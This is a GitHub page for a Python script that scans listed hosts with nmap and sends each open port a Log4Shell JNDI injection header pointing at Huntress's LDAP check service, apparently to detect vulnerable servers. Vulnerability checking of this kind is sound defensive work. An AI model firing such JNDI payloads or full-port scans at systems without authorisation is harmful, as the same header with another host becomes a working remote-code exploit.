-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathHuntressAutomate.py
67 lines (46 loc) · 2.11 KB
/
HuntressAutomate.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
import requests
import shlex
import subprocess
targets = []
formattedTargets = []
#get all the hosts you want to test
def importTargets():
#Read a file with targets
print("\nImporting Targets...")
file = open("Targets.txt", "r")
for line in file:
targets.append(line)
print("Targets Imported Successfully")
#Find the open ports on each host
def findOpenPorts():
print("\nFinding open ports on all targets... \nThis may take a long time depending on the number of targets you have specified.")
for target in targets:
proc = subprocess.Popen(shlex.split('nmap -sS -p- %s' % (target)), shell=True, stdout=subprocess.PIPE)
#save the open ports and the target to a list.
#output = proc.communicate()[0]
#output = output.splitlines()
for line in proc.stdout:
temp = line.decode()
components = temp.split('/')
if len(components) > 1:
if "open" in temp:
port = components[0]
formattedTargets.append('https://%s:%s' % (target, port))
formattedTargets.append('http://%s:%s' %(target, port))
print("Target enumeration complete. Targets found: \n %s" % (formattedTargets))
#for each open port on each host, test whether they are vulnerable using huntress
#send http request
def runExploitTest(customLdapConnection):
print("\n Sending Payloads to targets...")
headers = {"X-Api-Version": "${jndi:ldap://log4shell.huntress.com:1389/%s}" % (customLdapConnection)}
for ft in formattedTargets:
try:
response = requests.request(method='GET', url=ft, headers=headers)
except(requests.exceptions.RequestException):
pass
print("Payloads sent to all open ports, please switch to the Huntress website to view any vulnerable devices.")
if __name__=="__main__":
LdapConnection = raw_input("Please enter your custom LDAP Connection string provided to you by huntress: \n")
importTargets()
findOpenPorts()
runExploitTest(LdapConnection)